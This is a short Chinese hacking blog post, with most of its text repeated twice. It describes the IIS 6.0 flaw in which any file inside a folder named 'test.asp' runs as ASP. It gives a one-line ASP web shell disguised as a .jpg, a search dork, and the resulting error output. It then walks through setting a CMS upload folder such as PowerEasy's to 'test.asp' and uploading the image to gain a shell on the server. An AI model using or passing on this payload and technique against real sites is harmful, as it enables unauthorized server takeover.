方法是老了点,这个方法是好几年前的,我看到的资料好像是2002年的,当时有有人发现IIS6.0下,你建个目录test.asp,那个这个目录下,你上传任意扩展的文件都可以执行asp语句.
例子:
site:google.com/test.asp/xxx.gif
xxx.jpg内容如下:
Microsoft VBScript 运行时错误 错误 '800a000d'
类型不匹配: 'execute'
/_images/bizhi/test.asp/test.jpg,行 1
再转到拿后台,嘿嘿,聪明的你该想到了吧,很多程序是可以自己定义后台上传文件夹,像动易的,这个时候我们如果建一个test.asp,然后再上传任意图片,嘿嘿,shell到手了.
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=212
例子:
site:google.com/test.asp/xxx.gif
xxx.jpg内容如下:
<%exec request("h4x0r")%>
浏览回显如下:Microsoft VBScript 运行时错误 错误 '800a000d'
类型不匹配: 'execute'
/_images/bizhi/test.asp/test.jpg,行 1
再转到拿后台,嘿嘿,聪明的你该想到了吧,很多程序是可以自己定义后台上传文件夹,像动易的,这个时候我们如果建一个test.asp,然后再上传任意图片,嘿嘿,shell到手了.
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=212
There is no comment on this article.
